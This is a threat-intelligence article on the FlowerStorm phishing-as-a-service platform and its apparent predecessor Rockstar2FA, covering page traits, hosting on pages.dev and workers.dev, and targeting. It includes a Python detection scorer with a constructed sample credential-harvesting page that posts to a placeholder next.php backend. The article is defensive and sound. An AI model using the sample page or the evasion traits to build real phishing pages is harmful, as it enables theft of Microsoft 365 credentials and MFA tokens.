The Rise of FlowerStorm: Successor to Rockstar2FA in Phishing-as-a-Service

As the cybersecurity landscape continues to evolve, so too do the methods employed by cybercriminals. One of the more concerning trends in recent years is the proliferation of phishing-as-a-service (PhaaS) platforms, which simplify the deployment of phishing campaigns for malicious actors with varying levels of technical expertise. Among these, the Rockstar2FA platform emerged as a prominent name until its sudden collapse in November 2024. In its wake, a new player, FlowerStorm, has stepped in to fill the void, raising questions about its origins, operations, and similarities to its predecessor.

The Decline of Rockstar2FA

Rockstar2FA was a sophisticated phishing service targeting Microsoft 365 accounts. Operating under a PhaaS model, it offered clients advanced tools for bypassing detection, multiple phishing settings, and access for $200 per two weeks. The platform specialized in mimicking legitimate login pages to harvest credentials and multi-factor authentication (MFA) tokens—a critical aspect of modern cybersecurity.

However, in November 2024, Rockstar2FA’s infrastructure suffered a major setback. According to Sophos researchers, the collapse was not due to law enforcement actions but likely a technical failure. The service’s backend servers became unreachable, and phishing pages began returning Cloudflare 522 errors, indicating that Cloudflare could no longer reach the origin servers behind the phishing pages. Telegram channels used for command and control also went offline, effectively halting operations. This abrupt end created a power vacuum in the phishing ecosystem.

The Emergence of FlowerStorm

Shortly after Rockstar2FA’s decline, FlowerStorm began to rise in prominence. First detected in June 2024, FlowerStorm gained traction among cybercriminals following Rockstar2FA’s collapse. The platform shares many features with its predecessor, leading experts to speculate that FlowerStorm may be a rebranded version of Rockstar2FA, operated by the same individuals or groups.

Both platforms employ phishing portals that replicate legitimate login pages. These portals are designed to collect user credentials and MFA tokens, relying on backend servers hosted under top-level domains such as .com, .de, .ru, and .moscow. FlowerStorm uses a standardized "next.php" script for backend operations, a slight deviation from Rockstar2FA’s randomized PHP script names.

Similarities Between Rockstar2FA and FlowerStorm

The parallels between Rockstar2FA and FlowerStorm are striking, suggesting a shared ancestry:

1. Phishing Techniques: Both platforms use phishing portals that mimic login pages, incorporating fields for email, password, and session tracking tokens. They also support email validation and MFA challenges, key elements in deceiving victims.

2. HTML Structure: The HTML code of their phishing pages contains random text in comments and uses Cloudflare’s Turnstile security features. Both platforms display prompts such as “Initializing browser security protocols” to lend credibility to their malicious schemes.

3. Domain and Hosting Patterns: Domain registrations and hosting strategies are nearly identical. Activity on both platforms rose and fell in sync until Rockstar2FA’s shutdown, reinforcing the idea of a direct link between them.

4. Operational Mistakes: Both platforms’ operators made errors that exposed their backend infrastructure, facilitating analysis by cybersecurity researchers. For instance, Rockstar2FA operated over 2,000 domains, while FlowerStorm’s network expanded rapidly after Rockstar2FA’s collapse, suggesting a continuation of operations under a new guise.

FlowerStorm’s Unique Features

Despite its similarities to Rockstar2FA, FlowerStorm has introduced its own elements. For example, it uses plant-themed names in its HTML page titles, such as “Flower,” “Sprout,” and “Blossom.” This thematic shift appears in other aspects of its design, including comments in its HTML code and visible security prompts designed to deceive victims.

Additionally, FlowerStorm’s backend servers rely on specific PHP scripts for data exfiltration and authentication. It has also demonstrated greater reliance on Cloudflare’s serverless deployment tools, such as pages.dev and workers.dev, to host phishing portals. These technical adaptations highlight the evolving nature of phishing platforms and their ability to exploit modern hosting solutions.
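The page-level traits listed above (plant-themed titles, random filler comments, a Turnstile widget, the “Initializing browser security protocols” prompt, a form posting to next.php, and hosting on Cloudflare serverless domains) are exactly the kind of signals a defender can turn into a triage heuristic for suspicious login pages found in email sandboxes or proxy logs. The following Python scorer is an added example written for this article; it is not Sophos’ detection logic or code from either platform. The weights, the threshold, and the two sample pages and their host names are constructed for illustration, and the `random_looking` test for filler comments is a hypothetical approximation of the “random text in comments” trait described in the article.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicators drawn from the article above; weights and threshold are assumptions.
PLANT_TITLES = {"flower", "sprout", "blossom"}
LURE_PROMPT = "initializing browser security protocols"
BACKEND_SCRIPT = "next.php"
SERVERLESS_HOSTS = ("pages.dev", "workers.dev")
TURNSTILE_MARKER = "challenges.cloudflare.com/turnstile"
WEIGHTS = {
    "serverless_host": 1,   # legitimate sites use these too, so low weight
    "plant_title": 2,
    "lure_prompt": 3,
    "next_php_backend": 3,
    "turnstile": 1,         # common on benign sites; only meaningful in combination
    "random_comment": 1,
}
SUSPICIOUS_THRESHOLD = 4


class PageFeatures(HTMLParser):
    """Collect the title, form actions, script sources, comments and visible text."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self._in_title = False
        self.form_actions = []
        self.script_srcs = []
        self.comments = []
        self.text = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        elif tag == "script" and a.get("src"):
            self.script_srcs.append(a["src"])

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data
        else:
            self.text.append(data)

    def handle_comment(self, data):
        self.comments.append(data)


def random_looking(comment: str) -> bool:
    """Hypothetical filler-comment test: one alphanumeric token mixing letters and digits."""
    c = comment.strip()
    return (len(c) >= 12 and c.isalnum()
            and any(ch.isdigit() for ch in c) and any(ch.isalpha() for ch in c))


def score_page(html: str, page_url: str) -> dict:
    """Return the matched indicators, a weighted score and a suspicious flag."""
    p = PageFeatures()
    p.feed(html)
    host = urlparse(page_url).hostname or ""
    hits = []
    if any(host == h or host.endswith("." + h) for h in SERVERLESS_HOSTS):
        hits.append("serverless_host")
    if PLANT_TITLES & set(re.findall(r"[a-z]+", p.title.lower())):
        hits.append("plant_title")
    if LURE_PROMPT in " ".join(p.text).lower():
        hits.append("lure_prompt")
    if any(BACKEND_SCRIPT in act for act in p.form_actions):
        hits.append("next_php_backend")
    if any(TURNSTILE_MARKER in src for src in p.script_srcs):
        hits.append("turnstile")
    if any(random_looking(c) for c in p.comments):
        hits.append("random_comment")
    score = sum(WEIGHTS[h] for h in hits)
    return {"hits": hits, "score": score, "suspicious": score >= SUSPICIOUS_THRESHOLD}


# Constructed sample: a page carrying the traits the article describes (placeholder hosts).
PHISH_URL = "https://login-example.pages.dev/"
PHISH_HTML = """<html><head><title>Blossom</title>
<script src="https://challenges.cloudflare.com/turnstile/v0/api.js"></script>
<!-- qX8vRt2LpZ9mKw4B -->
</head><body><div id="msg">Initializing browser security protocols</div>
<form method="post" action="https://backend-example.moscow/next.php">
<input name="email"><input name="password"><input type="hidden" name="session">
</form></body></html>"""

# Constructed sample: a benign sign-in page that also uses Turnstile.
BENIGN_URL = "https://intranet.example.com/login"
BENIGN_HTML = """<html><head><title>Contoso Intranet Sign-in</title>
<script src="https://challenges.cloudflare.com/turnstile/v0/api.js"></script>
<!-- main layout --></head><body>
<form method="post" action="/login"><input name="user"><input name="password"></form>
</body></html>"""

if __name__ == "__main__":
    for url, html in ((PHISH_URL, PHISH_HTML), (BENIGN_URL, BENIGN_HTML)):
        print(url, score_page(html, url))
```

The point of the weighting is that no single trait is damning: Turnstile and pages.dev hosting are used by plenty of legitimate sites, so they only contribute when they co-occur with the lure prompt, the plant-themed title or the next.php backend. A scorer like this belongs at the triage stage, feeding a human or a sandbox verdict rather than blocking on its own.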

Targeting and Impact

FlowerStorm’s rise has had significant implications for cybersecurity. According to Sophos, approximately 84% of FlowerStorm’s targets are located in the United States, with other significant targets in Canada, the United Kingdom, Australia, and Italy. The majority of these targets belong to industries such as engineering, construction, real estate, legal services, and consulting—sectors where compromised credentials can yield high-value information.

The platform’s reliance on a PhaaS model means that its operators do not directly select targets; rather, this is left to their clients. However, the rapid adoption of FlowerStorm suggests its effectiveness in meeting the demands of cybercriminals. Its advanced features and ease of use have made it a popular choice for launching phishing campaigns.

Challenges and Missteps

FlowerStorm’s rapid expansion has not been without challenges. Researchers have identified operational misconfigurations that disrupted some of its phishing pages. For example, some pages failed to connect to their backend servers, rendering them ineffective. These errors have provided cybersecurity experts with valuable insights into FlowerStorm’s operations, enabling them to identify and counteract its infrastructure.

Such missteps highlight the inherent risks in operating large-scale phishing platforms. While FlowerStorm’s operators have demonstrated technical competence, their mistakes offer opportunities for defenders to analyze and dismantle their operations.

The Bigger Picture

The rise and fall of platforms like Rockstar2FA and FlowerStorm highlight the adaptability of cybercriminal networks. When one service falters, another quickly emerges to fill the void. This underscores the need for continuous vigilance and innovation in cybersecurity practices.

Organizations must prioritize MFA implementation, employee training, and robust email filtering to mitigate the risks posed by PhaaS platforms. Additionally, collaboration between cybersecurity firms, government agencies, and cloud service providers is essential to dismantle such operations and protect potential victims. Enhanced threat intelligence sharing and proactive monitoring are critical to staying ahead of these evolving threats.

Conclusion

While the exact relationship between Rockstar2FA and FlowerStorm remains speculative, their similarities point to a common origin or shared knowledge base. The evolution of FlowerStorm reflects the dynamic nature of the cybercrime ecosystem, where disruption often leads to innovation. By understanding these platforms’ methodologies and vulnerabilities, defenders can stay one step ahead in the ongoing battle against phishing threats.

As PhaaS platforms continue to proliferate, cybersecurity professionals must remain vigilant. The fight against phishing requires constant adaptation, collaboration, and a deep understanding of adversaries’ tactics. Only by staying informed and proactive can organizations effectively combat the growing threat of phishing-as-a-service.
